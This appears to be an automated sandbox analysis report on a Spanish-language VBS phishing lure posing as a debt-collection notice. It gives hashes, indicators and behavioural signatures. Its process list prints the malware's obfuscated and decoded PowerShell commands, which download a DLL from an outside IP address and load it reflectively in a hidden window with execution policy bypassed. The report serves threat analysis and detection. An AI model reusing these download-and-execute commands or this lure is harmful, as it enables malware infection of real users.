Analysis
-
max time kernel
45s -
max time network
49s -
platform
windows7_x64 -
resource
win7-20220715-en -
resource tags
arch:x64arch:x86image:win7-20220715-enlocale:en-usos:windows7-x64system -
submitted
11/08/2022, 14:55
Static task
static1
Behavioral task
behavioral1
Sample
Su contraseña es 118 Tramitándose expediente administrativo para el cobro de sus deudas pendient.vbs
Resource
win7-20220715-en
General
-
Target
Su contraseña es 118 Tramitándose expediente administrativo para el cobro de sus deudas pendient.vbs
-
Size
205KB
-
MD5
173a182f65910267fa0e8590dd0cfc0e
-
SHA1
3b8bf6b2f4ad725511fca0e0198b4499c75fe86c
-
SHA256
49bb9b1be17a3b590a8cb4245e1a3f07fb13648676ff7e0240f3030678c503d6
-
SHA512
44d5a9a9d2166253c2af4b8820f323d29a2cd7042a3408440bd86b8422d25a28006891ca9f690d756271e85d09965047c2eebcbd18b5af8a378ff0785924900d
Malware Config
Extracted
http://91.241.19.49/ARTS/dllf3txt
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2044 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 240 powershell.exe 2044 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 240 powershell.exe Token: SeDebugPrivilege 2044 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1940 wrote to memory of 240 1940 WScript.exe 27 PID 1940 wrote to memory of 240 1940 WScript.exe 27 PID 1940 wrote to memory of 240 1940 WScript.exe 27 PID 240 wrote to memory of 2044 240 powershell.exe 29 PID 240 wrote to memory of 2044 240 powershell.exe 29 PID 240 wrote to memory of 2044 240 powershell.exe 29
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Su contraseña es 118 Tramitándose expediente administrativo para el cobro de sus deudas pendient.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwAlAEsASQB0AE8ATwBQAF⌚⌚⌚AaQBTAE8AVQBsAFEARABqAHYAWABBAE8AZwAlACcAOwBbAEIAeQB0AG⌚⌚⌚AWwBdAF0AIAAkAEQATABMACAAPQAgAFsA⌚⌚⌚wB5AHMAdABlAG0ALgBDAG8AbgB2AG⌚⌚⌚AcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQA⌚⌚⌚wB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAG⌚⌚⌚AdAAuAFcAZQBiAEMAbABpAG⌚⌚⌚AbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQA⌚⌚⌚wB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgA0ADEALgAxADkALgA0ADkALwBBAFIAVABTAC8AZABsAGwAZgAzAHQAeAB0ACcAKQApADsAWwBTAHkAcwB0AG⌚⌚⌚AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAeABLAHYASwBrAH⌚⌚⌚ATgBaAC4AVQBHAGwAeQBtAHoAVQBnACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBVAEQAcwBTAGkARABiAGIAJwApAC4ASQBuAHYAbwBrAG⌚⌚⌚AKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIAAoACcAdAB4AHQALgAxAFgAWgAvAHcAZQBuAC8AdABzAG⌚⌚⌚AdAAvADkANAAuADkAMQAuADEANAAyAC4AMQA5AC8ALwA6AHAAdAB0AGgAJwAgACwAIAAkAFIAbwBkAGEAQwBvAHAAeQAgACwAIAAnACYAJQAkAD⌚⌚⌚AdABCAFQARABZACgAKQBSADAAJQAkACMAIgBIAEYASgBmAGIAJwAgACkAKQA=';$OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('⌚⌚⌚','U') ) );$OWjuxD = $OWjuxD.replace('%KItOOPUiSOUlQDjvXAOg%', 'C:\Users\Admin\AppData\Local\Temp\Su contraseña es 118 Tramitándose expediente administrativo para el cobro de sus deudas pendient.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:240 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Users\Admin\AppData\Local\Temp\Su contraseña es 118 Tramitándose expediente administrativo para el cobro de sus deudas pendient.vbs';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/ARTS/dllf3txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('xKvKkuNZ.UGlymzUg').GetMethod('UDsSiDbb').Invoke($null, [object[]] ('txt.1XZ/wen/tset/94.91.142.19//:ptth' , $RodaCopy , '&%$5tBTDY()R0%$#"HFJfb' ))"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2044
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5f007338b947c62892340662049c231df
SHA193bb79455ff72b60c1e90c842c5d1df7c197d9d6
SHA25696f4a8433a83acc63123737e9c5b3f8c7ab50bc25ad1e9b6a44987a922e946a4
SHA5122ac8c1ac97fdbf1ad621e69da75535521e8af805acf55af29db733831fd44c3c845db28390429ece6e58607f676aa99b19fb5c4c3975303734c4aa9322343376